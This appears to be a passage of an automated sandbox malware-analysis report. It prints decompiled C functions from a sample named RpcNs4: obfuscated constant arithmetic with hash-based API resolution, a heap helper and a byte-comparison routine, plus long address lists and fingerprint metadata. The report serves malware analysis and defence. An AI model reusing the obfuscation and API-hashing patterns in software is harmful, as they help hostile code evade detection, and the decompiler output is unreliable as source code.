                                                                                                      				signed int _v12;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				intOrPtr* _t79;
                                                                                                      				signed int _t80;
                                                                                                      				intOrPtr* _t84;
                                                                                                      				signed int _t85;
                                                                                                      				intOrPtr* _t87;
                                                                                                      				int _t93;
                                                                                                      				void* _t98;
                                                                                                      				signed int _t100;
                                                                                                      				signed int _t108;
                                                                                                      				void* _t130;
                                                                                                      				void* _t134;
                                                                                                      				void* _t135;
                                                                                                      				signed int _t137;
                                                                                                      				signed int* _t138;
                                                                                                      
                                                                                                      				_t138 =  &_v12;
                                                                                                      				_v8 = 0x528c;
                                                                                                      				_t134 = __ecx;
                                                                                                      				_v8 = _v8 * 0x72;
                                                                                                      				_v8 = _v8 ^ 0x9107d438;
                                                                                                      				_v8 = _v8 | 0x10285ebd;
                                                                                                      				_v8 = _v8 ^ 0x912b5ef5;
                                                                                                      				_v12 = 0xf31e;
                                                                                                      				_v12 = 0xcccccccd * _v12 >> 0x20 >> 3;
                                                                                                      				_v12 = _v12 >> 0xd;
                                                                                                      				_v12 = 0xae4c415d * _v12 >> 0x20 >> 6;
                                                                                                      				_v12 = _v12 >> 7;
                                                                                                      				_v12 = _v12 << 0x10;
                                                                                                      				_v12 = _v12 ^ 0x00000010;
                                                                                                      				_t79 =  *0x20bdc10;
                                                                                                      				if(_t79 == 0) {
                                                                                                      					_t79 = E020B3DD0(_t98, E020B3E70(0xbb51e2dc), 0x8ecd1a70, _t135);
                                                                                                      					 *0x20bdc10 = _t79;
                                                                                                      				}
                                                                                                      				_t80 =  *_t79();
                                                                                                      				_v12 = 0x67c;
                                                                                                      				_v12 = _v12 + 0xffff9f39;
                                                                                                      				_t137 = _v8 + _t80 % _v12;
                                                                                                      				_v12 = _v12 * 0x54;
                                                                                                      				_v12 = _v12 * 0x4e;
                                                                                                      				_v12 = _v12 + 0xffff85ad;
                                                                                                      				_v12 = _v12 << 0xe;
                                                                                                      				_v12 = _v12 | 0xf2b00a51;
                                                                                                      				_v12 = _v12 ^ 0xf7b94a59;
                                                                                                      				_v8 = 0x7d3a;
                                                                                                      				_v8 = _v8 >> 8;
                                                                                                      				_v8 = _v8 + 0x5074;
                                                                                                      				_v8 = _v8 | 0xd46b9a92;
                                                                                                      				_v8 = _v8 ^ 0xd46bdae3;
                                                                                                      				_t84 =  *0x20bdc10;
                                                                                                      				if(_t84 == 0) {
                                                                                                      					_t84 = E020B3DD0(_t98, E020B3E70(0xbb51e2dc), 0x8ecd1a70, _t137);
                                                                                                      					 *0x20bdc10 = _t84;
                                                                                                      				}
                                                                                                      				_t85 =  *_t84();
                                                                                                      				_t87 =  *0x20bdc10;
                                                                                                      				_t100 = _v12 + _t85 % _v8;
                                                                                                      				if(_t87 == 0) {
                                                                                                      					_t87 = E020B3DD0(_t100, E020B3E70(0xbb51e2dc), 0x8ecd1a70, _t137);
                                                                                                      					 *0x20bdc10 = _t87;
                                                                                                      				}
                                                                                                      				_v4 =  *_t87();
                                                                                                      				if(_t137 != 0) {
                                                                                                      					_t130 = _t134;
                                                                                                      					_t108 = _t137 >> 1;
                                                                                                      					_t134 = _t134 + _t137 * 2;
                                                                                                      					_t93 = memset(_t130, 0x2d002d, _t108 << 2);
                                                                                                      					asm("adc ecx, ecx");
                                                                                                      					memset(_t130 + _t108, _t93, 0);
                                                                                                      					_t138 =  &(_t138[6]);
                                                                                                      				}
                                                                                                      				E020B4E10(_t134, _t100,  &_v4);
                                                                                                      				 *((short*)(_t134 + _t100 * 2)) = 0;
                                                                                                      				return 0;
                                                                                                      			}






















                                                                                                      0x020b1c10
                                                                                                      0x020b1c13
                                                                                                      0x020b1c23
                                                                                                      0x020b1c25
                                                                                                      0x020b1c2e
                                                                                                      0x020b1c36
                                                                                                      0x020b1c3e
                                                                                                      0x020b1c46
                                                                                                      0x020b1c5c
                                                                                                      0x020b1c60
                                                                                                      0x020b1c6e
                                                                                                      0x020b1c72
                                                                                                      0x020b1c77
                                                                                                      0x020b1c7c
                                                                                                      0x020b1c81
                                                                                                      0x020b1c88
                                                                                                      0x020b1c9b
                                                                                                      0x020b1ca0
                                                                                                      0x020b1ca0
                                                                                                      0x020b1ca5
                                                                                                      0x020b1cb3
                                                                                                      0x020b1cbb
                                                                                                      0x020b1cc3
                                                                                                      0x020b1cca
                                                                                                      0x020b1cd3
                                                                                                      0x020b1cd7
                                                                                                      0x020b1cdf
                                                                                                      0x020b1ce4
                                                                                                      0x020b1cec
                                                                                                      0x020b1cf4
                                                                                                      0x020b1cfc
                                                                                                      0x020b1d01
                                                                                                      0x020b1d09
                                                                                                      0x020b1d11
                                                                                                      0x020b1d19
                                                                                                      0x020b1d20
                                                                                                      0x020b1d33
                                                                                                      0x020b1d38
                                                                                                      0x020b1d38
                                                                                                      0x020b1d3d
                                                                                                      0x020b1d4b
                                                                                                      0x020b1d50
                                                                                                      0x020b1d54
                                                                                                      0x020b1d67
                                                                                                      0x020b1d6c
                                                                                                      0x020b1d6c
                                                                                                      0x020b1d73
                                                                                                      0x020b1d79
                                                                                                      0x020b1d7e
                                                                                                      0x020b1d80
                                                                                                      0x020b1d82
                                                                                                      0x020b1d8a
                                                                                                      0x020b1d8c
                                                                                                      0x020b1d8e
                                                                                                      0x020b1d8e
                                                                                                      0x020b1d91
                                                                                                      0x020b1d9b
                                                                                                      0x020b1da5
                                                                                                      0x020b1daf

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: tP
                                                                                                      • API String ID: 0-1642201081
                                                                                                      • Opcode ID: fce1fa16219969650c9e869f2012bb7f361f5a3b038f51465d7940f77dadb2ba
                                                                                                      • Instruction ID: eedcb6507fcd70bcf44d68af5c469e78a6ca642cd9ac2955f7d613afeb37869d
                                                                                                      • Opcode Fuzzy Hash: fce1fa16219969650c9e869f2012bb7f361f5a3b038f51465d7940f77dadb2ba
                                                                                                      • Instruction Fuzzy Hash: 40414770A083059FD359DF69D51519BB7E2BFC4350F00CC2EE4AA8B254DBB8DA189F82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E0040408A() {
                                                                                                      				void* _t3;
                                                                                                      
                                                                                                      				_t3 = GetProcessHeap();
                                                                                                      				 *0x43735c = _t3;
                                                                                                      				return 0 | _t3 != 0x00000000;
                                                                                                      			}




                                                                                                      0x0040408a
                                                                                                      0x00404092
                                                                                                      0x0040409e

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00402B5F,00434230,00000014), ref: 0040408A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 8f503368fa4569f528358c097caf931e5ce8d7e04b0f275c2f1b97ab656b49d6
                                                                                                      • Instruction ID: 80e3445bce11249cb0ff14713bb76a3cdeac655ff22992080aafcb8a6e7864b8
                                                                                                      • Opcode Fuzzy Hash: 8f503368fa4569f528358c097caf931e5ce8d7e04b0f275c2f1b97ab656b49d6
                                                                                                      • Instruction Fuzzy Hash: C9B012F0305103475B0C0B397C1805936D4570C221304507D7883C2160DF60C850EF08
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00416919(void* __edx, void* __esi) {
                                                                                                      				signed int _t192;
                                                                                                      				signed char _t193;
                                                                                                      				signed char _t194;
                                                                                                      				signed char _t195;
                                                                                                      				signed char _t196;
                                                                                                      				signed char _t198;
                                                                                                      				signed int _t241;
                                                                                                      				void* _t287;
                                                                                                      				void* _t292;
                                                                                                      				void* _t294;
                                                                                                      				void* _t296;
                                                                                                      				void* _t298;
                                                                                                      				void* _t300;
                                                                                                      				void* _t302;
                                                                                                      				void* _t304;
                                                                                                      				void* _t306;
                                                                                                      				void* _t308;
                                                                                                      				void* _t310;
                                                                                                      				void* _t312;
                                                                                                      				void* _t314;
                                                                                                      				void* _t316;
                                                                                                      				void* _t318;
                                                                                                      				void* _t320;
                                                                                                      				void* _t322;
                                                                                                      				void* _t324;
                                                                                                      				void* _t326;
                                                                                                      				void* _t327;
                                                                                                      
                                                                                                      				_t327 = __esi;
                                                                                                      				_t287 = __edx;
                                                                                                      				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                                                                                                      					_t241 = 0;
                                                                                                      					L15:
                                                                                                      					if(_t241 != 0) {
                                                                                                      						goto L2;
                                                                                                      					}
                                                                                                      					_t193 =  *(_t327 - 0x1a);
                                                                                                      					if(_t193 ==  *(_t287 - 0x1a)) {
                                                                                                      						_t241 = 0;
                                                                                                      						L26:
                                                                                                      						if(_t241 != 0) {
                                                                                                      							goto L2;
                                                                                                      						}
                                                                                                      						_t194 =  *(_t327 - 0x16);
                                                                                                      						if(_t194 ==  *(_t287 - 0x16)) {
                                                                                                      							_t241 = 0;
                                                                                                      							L37:
                                                                                                      							if(_t241 != 0) {
                                                                                                      								goto L2;
                                                                                                      							}
                                                                                                      							_t195 =  *(_t327 - 0x12);
                                                                                                      							if(_t195 ==  *(_t287 - 0x12)) {
                                                                                                      								_t241 = 0;
                                                                                                      								L48:
                                                                                                      								if(_t241 != 0) {
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      								_t196 =  *(_t327 - 0xe);
                                                                                                      								if(_t196 ==  *(_t287 - 0xe)) {
                                                                                                      									_t241 = 0;
                                                                                                      									L59:
                                                                                                      									if(_t241 != 0) {
                                                                                                      										goto L2;
                                                                                                      									}
                                                                                                      									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                                                                                                      										_t241 = 0;
                                                                                                      										L70:
                                                                                                      										if(_t241 != 0) {
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      										_t198 =  *(_t327 - 6);
                                                                                                      										if(_t198 ==  *(_t287 - 6)) {
                                                                                                      											_t241 = 0;
                                                                                                      											L81:
                                                                                                      											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                                                                                                      											}
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                                                                                                      										if(_t292 == 0) {
                                                                                                      											L74:
                                                                                                      											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                                                                                                      											if(_t294 == 0) {
                                                                                                      												L76:
                                                                                                      												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                                                                                                      												if(_t296 == 0) {
                                                                                                      													L78:
                                                                                                      													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                                                                                                      													if(_t241 != 0) {
                                                                                                      														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                                                      													}
                                                                                                      													goto L81;
                                                                                                      												}
                                                                                                      												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                                                                      												if(_t241 != 0) {
                                                                                                      													goto L2;
                                                                                                      												}
                                                                                                      												goto L78;
                                                                                                      											}
                                                                                                      											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t241 != 0) {
                                                                                                      												goto L2;
                                                                                                      											}
                                                                                                      											goto L76;
                                                                                                      										}
                                                                                                      										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t241 != 0) {
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      										goto L74;
                                                                                                      									}
                                                                                                      									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                                                                                                      									if(_t298 == 0) {
                                                                                                      										L63:
                                                                                                      										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                                                                                                      										if(_t300 == 0) {
                                                                                                      											L65:
                                                                                                      											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                                                                                                      											if(_t302 == 0) {
                                                                                                      												L67:
                                                                                                      												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                                                                                                      												if(_t241 != 0) {
                                                                                                      													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                                                      												}
                                                                                                      												goto L70;
                                                                                                      											}
                                                                                                      											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t241 != 0) {
                                                                                                      												goto L2;
                                                                                                      											}
                                                                                                      											goto L67;
                                                                                                      										}
                                                                                                      										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t241 != 0) {
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      										goto L65;
                                                                                                      									}
                                                                                                      									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t241 != 0) {
                                                                                                      										goto L2;
                                                                                                      									}
                                                                                                      									goto L63;
                                                                                                      								}
                                                                                                      								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                                                                                                      								if(_t304 == 0) {
                                                                                                      									L52:
                                                                                                      									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                                                                                                      									if(_t306 == 0) {
                                                                                                      										L54:
                                                                                                      										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                                                                                                      										if(_t308 == 0) {
                                                                                                      											L56:
                                                                                                      											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                                                                                                      											if(_t241 != 0) {
                                                                                                      												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                                                      											}
                                                                                                      											goto L59;
                                                                                                      										}
                                                                                                      										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t241 != 0) {
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      										goto L56;
                                                                                                      									}
                                                                                                      									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t241 != 0) {
                                                                                                      										goto L2;
                                                                                                      									}
                                                                                                      									goto L54;
                                                                                                      								}
                                                                                                      								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t241 != 0) {
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      								goto L52;
                                                                                                      							}
                                                                                                      							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                                                                                                      							if(_t310 == 0) {
                                                                                                      								L41:
                                                                                                      								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                                                                                                      								if(_t312 == 0) {
                                                                                                      									L43:
                                                                                                      									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                                                                                                      									if(_t314 == 0) {
                                                                                                      										L45:
                                                                                                      										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                                                                                                      										if(_t241 != 0) {
                                                                                                      											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                                                      										}
                                                                                                      										goto L48;
                                                                                                      									}
                                                                                                      									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t241 != 0) {
                                                                                                      										goto L2;
                                                                                                      									}
                                                                                                      									goto L45;
                                                                                                      								}
                                                                                                      								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t241 != 0) {
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      								goto L43;
                                                                                                      							}
                                                                                                      							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t241 != 0) {
                                                                                                      								goto L2;
                                                                                                      							}
                                                                                                      							goto L41;
                                                                                                      						}
                                                                                                      						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                                                                                                      						if(_t316 == 0) {
                                                                                                      							L30:
                                                                                                      							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                                                                                                      							if(_t318 == 0) {
                                                                                                      								L32:
                                                                                                      								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                                                                                                      								if(_t320 == 0) {
                                                                                                      									L34:
                                                                                                      									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                                                                                                      									if(_t241 != 0) {
                                                                                                      										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                                                      									}
                                                                                                      									goto L37;
                                                                                                      								}
                                                                                                      								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t241 != 0) {
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      								goto L34;
                                                                                                      							}
                                                                                                      							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t241 != 0) {
                                                                                                      								goto L2;
                                                                                                      							}
                                                                                                      							goto L32;
                                                                                                      						}
                                                                                                      						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t241 != 0) {
                                                                                                      							goto L2;
                                                                                                      						}
                                                                                                      						goto L30;
                                                                                                      					}
                                                                                                      					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                                                                                                      					if(_t322 == 0) {
                                                                                                      						L19:
                                                                                                      						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                                                                                                      						if(_t324 == 0) {
                                                                                                      							L21:
                                                                                                      							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                                                                                                      							if(_t326 == 0) {
                                                                                                      								L23:
                                                                                                      								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                                                                                                      								if(_t241 != 0) {
                                                                                                      									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                                                      								}
                                                                                                      								goto L26;
                                                                                                      							}
                                                                                                      							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t241 != 0) {
                                                                                                      								goto L2;
                                                                                                      							}
                                                                                                      							goto L23;
                                                                                                      						}
                                                                                                      						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t241 != 0) {
                                                                                                      							goto L2;
                                                                                                      						}
                                                                                                      						goto L21;
                                                                                                      					}
                                                                                                      					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                                                                                                      					if(_t241 != 0) {
                                                                                                      						goto L2;
                                                                                                      					}
                                                                                                      					goto L19;
                                                                                                      				} else {
                                                                                                      					__edi = __al & 0x000000ff;
                                                                                                      					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                                                                      					if(__edi == 0) {
                                                                                                      						L8:
                                                                                                      						__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                                                                      						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                                                      						if(__edi == 0) {
                                                                                                      							L10:
                                                                                                      							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                                                                      							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                                                      							if(__edi == 0) {
                                                                                                      								L12:
                                                                                                      								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                                                                                      								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                                                                      								if(__ecx != 0) {
                                                                                                      									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                                                      								}
                                                                                                      								goto L15;
                                                                                                      							}
                                                                                                      							0 = 0 | __edi > 0x00000000;
                                                                                                      							__ecx = (__edi > 0) * 2 != 1;
                                                                                                      							if((__edi > 0) * 2 != 1) {
                                                                                                      								L2:
                                                                                                      								_t192 = _t241;
                                                                                                      								return _t192;
                                                                                                      							}
                                                                                                      							goto L12;
                                                                                                      						}
                                                                                                      						0 = 0 | __edi > 0x00000000;
                                                                                                      						__ecx = (__edi > 0) * 2 != 1;
                                                                                                      						if((__edi > 0) * 2 != 1) {
                                                                                                      							goto L2;
                                                                                                      						}
                                                                                                      						goto L10;
                                                                                                      					}
                                                                                                      					0 = 0 | __edi > 0x00000000;
                                                                                                      					__ecx = (__edi > 0) * 2 != 1;
                                                                                                      					if((__edi > 0) * 2 != 1) {
                                                                                                      						goto L2;
                                                                                                      					}
                                                                                                      					goto L8;
                                                                                                      				}
                                                                                                      			}






























                                                                                                      0x00416919
                                                                                                      0x00416919
                                                                                                      0x0041691f
                                                                                                      0x004169a6
                                                                                                      0x004169a8
                                                                                                      0x004169aa
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004169b0
                                                                                                      0x004169b6
                                                                                                      0x00416a3d
                                                                                                      0x00416a3f
                                                                                                      0x00416a41
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416a47
                                                                                                      0x00416a4d
                                                                                                      0x00416ad4
                                                                                                      0x00416ad6
                                                                                                      0x00416ad8
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ade
                                                                                                      0x00416ae4
                                                                                                      0x00416b6b
                                                                                                      0x00416b6d
                                                                                                      0x00416b6f
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416b75
                                                                                                      0x00416b7b
                                                                                                      0x00416c02
                                                                                                      0x00416c04
                                                                                                      0x00416c06
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416c12
                                                                                                      0x00416c9a
                                                                                                      0x00416c9c
                                                                                                      0x00416c9e
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ca4
                                                                                                      0x00416caa
                                                                                                      0x00416d31
                                                                                                      0x00416d33
                                                                                                      0x00416d35
                                                                                                      0x00416d35
                                                                                                      0x00000000
                                                                                                      0x00416d35
                                                                                                      0x00416cb7
                                                                                                      0x00416cb9
                                                                                                      0x00416cd1
                                                                                                      0x00416cd9
                                                                                                      0x00416cdb
                                                                                                      0x00416cf3
                                                                                                      0x00416cfb
                                                                                                      0x00416cfd
                                                                                                      0x00416d15
                                                                                                      0x00416d1d
                                                                                                      0x00416d1f
                                                                                                      0x00416d28
                                                                                                      0x00416d28
                                                                                                      0x00000000
                                                                                                      0x00416d1f
                                                                                                      0x00416d06
                                                                                                      0x00416d0f
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416d0f
                                                                                                      0x00416ce4
                                                                                                      0x00416ced
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ced
                                                                                                      0x00416cc2
                                                                                                      0x00416ccb
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ccb
                                                                                                      0x00416c20
                                                                                                      0x00416c22
                                                                                                      0x00416c3a
                                                                                                      0x00416c42
                                                                                                      0x00416c44
                                                                                                      0x00416c5c
                                                                                                      0x00416c64
                                                                                                      0x00416c66
                                                                                                      0x00416c7e
                                                                                                      0x00416c86
                                                                                                      0x00416c88
                                                                                                      0x00416c91
                                                                                                      0x00416c91
                                                                                                      0x00000000
                                                                                                      0x00416c88
                                                                                                      0x00416c6f
                                                                                                      0x00416c78
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416c78
                                                                                                      0x00416c4d
                                                                                                      0x00416c56
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416c56
                                                                                                      0x00416c2b
                                                                                                      0x00416c34
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416c34
                                                                                                      0x00416b88
                                                                                                      0x00416b8a
                                                                                                      0x00416ba2
                                                                                                      0x00416baa
                                                                                                      0x00416bac
                                                                                                      0x00416bc4
                                                                                                      0x00416bcc
                                                                                                      0x00416bce
                                                                                                      0x00416be6
                                                                                                      0x00416bee
                                                                                                      0x00416bf0
                                                                                                      0x00416bf9
                                                                                                      0x00416bf9
                                                                                                      0x00000000
                                                                                                      0x00416bf0
                                                                                                      0x00416bd7
                                                                                                      0x00416be0
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416be0
                                                                                                      0x00416bb5
                                                                                                      0x00416bbe
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416bbe
                                                                                                      0x00416b93
                                                                                                      0x00416b9c
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416b9c
                                                                                                      0x00416af1
                                                                                                      0x00416af3
                                                                                                      0x00416b0b
                                                                                                      0x00416b13
                                                                                                      0x00416b15
                                                                                                      0x00416b2d
                                                                                                      0x00416b35
                                                                                                      0x00416b37
                                                                                                      0x00416b4f
                                                                                                      0x00416b57
                                                                                                      0x00416b59
                                                                                                      0x00416b62
                                                                                                      0x00416b62
                                                                                                      0x00000000
                                                                                                      0x00416b59
                                                                                                      0x00416b40
                                                                                                      0x00416b49
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416b49
                                                                                                      0x00416b1e
                                                                                                      0x00416b27
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416b27
                                                                                                      0x00416afc
                                                                                                      0x00416b05
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416b05
                                                                                                      0x00416a5a
                                                                                                      0x00416a5c
                                                                                                      0x00416a74
                                                                                                      0x00416a7c
                                                                                                      0x00416a7e
                                                                                                      0x00416a96
                                                                                                      0x00416a9e
                                                                                                      0x00416aa0
                                                                                                      0x00416ab8
                                                                                                      0x00416ac0
                                                                                                      0x00416ac2
                                                                                                      0x00416acb
                                                                                                      0x00416acb
                                                                                                      0x00000000
                                                                                                      0x00416ac2
                                                                                                      0x00416aa9
                                                                                                      0x00416ab2
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ab2
                                                                                                      0x00416a87
                                                                                                      0x00416a90
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416a90
                                                                                                      0x00416a65
                                                                                                      0x00416a6e
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416a6e
                                                                                                      0x004169c3
                                                                                                      0x004169c5
                                                                                                      0x004169dd
                                                                                                      0x004169e5
                                                                                                      0x004169e7
                                                                                                      0x004169ff
                                                                                                      0x00416a07
                                                                                                      0x00416a09
                                                                                                      0x00416a21
                                                                                                      0x00416a29
                                                                                                      0x00416a2b
                                                                                                      0x00416a34
                                                                                                      0x00416a34
                                                                                                      0x00000000
                                                                                                      0x00416a2b
                                                                                                      0x00416a12
                                                                                                      0x00416a1b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416a1b
                                                                                                      0x004169f0
                                                                                                      0x004169f9
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004169f9
                                                                                                      0x004169ce
                                                                                                      0x004169d7
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416925
                                                                                                      0x00416925
                                                                                                      0x0041692c
                                                                                                      0x0041692e
                                                                                                      0x00416946
                                                                                                      0x00416946
                                                                                                      0x0041694e
                                                                                                      0x00416950
                                                                                                      0x00416968
                                                                                                      0x00416968
                                                                                                      0x00416970
                                                                                                      0x00416972
                                                                                                      0x0041698a
                                                                                                      0x0041698a
                                                                                                      0x00416992
                                                                                                      0x00416994
                                                                                                      0x0041699d
                                                                                                      0x0041699d
                                                                                                      0x00000000
                                                                                                      0x00416994
                                                                                                      0x00416978
                                                                                                      0x0041697b
                                                                                                      0x00416984
                                                                                                      0x004164dc
                                                                                                      0x004164dc
                                                                                                      0x004172cd
